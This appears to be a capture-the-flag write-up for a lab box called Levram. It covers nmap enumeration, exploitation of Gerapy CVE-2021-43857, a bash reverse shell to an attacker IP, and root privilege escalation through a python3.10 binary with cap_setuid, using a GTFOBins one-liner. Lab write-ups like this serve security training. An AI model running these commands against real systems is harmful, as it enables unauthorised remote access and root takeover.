Levram
Privilege Escalation via Python Binary with cap_setuid
Summary
Discovered only two open ports: SSH (22) and a web server (8000) running Gerapy.
Gerapy was running a vulnerable version, which led to authenticated command execution.
Exploited CVE-2021-43857 to gain an initial foothold.
Privilege escalation achieved using cap_setuid capability assigned to Python3 binary, allowing elevation to root.
🧵 Let's Unpack
Enumeration
sudo nmap -A -T4 -sV -sC -p- -Pn 192.168.229.24 --openOpen Ports:
22/tcp→ OpenSSH 8.9p1 Ubuntu8000/tcp→ Gerapy (WSGIServer/0.2 CPython/3.10.6)
📌 Interesting Findings:
Gerapy panel hosted on port 8000.
Web title confirmed it was running Gerapy.
robots.txtor web paths not exposed; had to manually verify version and exploit.
Initial Foothold
Used public exploit for Gerapy RCE: → CVE-2021-43857
The exploit chain allowed remote code execution by abusing insecure project configuration and file inclusion.
# Executed payload for reverse shell
bash -i >& /dev/tcp/192.168.45.240/9999 0>&1✅ Received reverse shell from Gerapy web context.
Privilege Escalation
getcap -r / 2>/dev/null
>
/snap/core20/1518/usr/bin/ping cap_net_raw=ep
/snap/core20/1891/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/ping cap_net_raw=epFound this:
/usr/bin/python3.10 cap_setuid=epThis capability allows the binary to change its user ID — effectively enabling escalation to root.
From GTFOBins – Python:
python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'🧨 Boom! Got a root shell.
# Upgraded shell
python3 -c 'import pty; pty.spawn("/bin/bash")'Last updated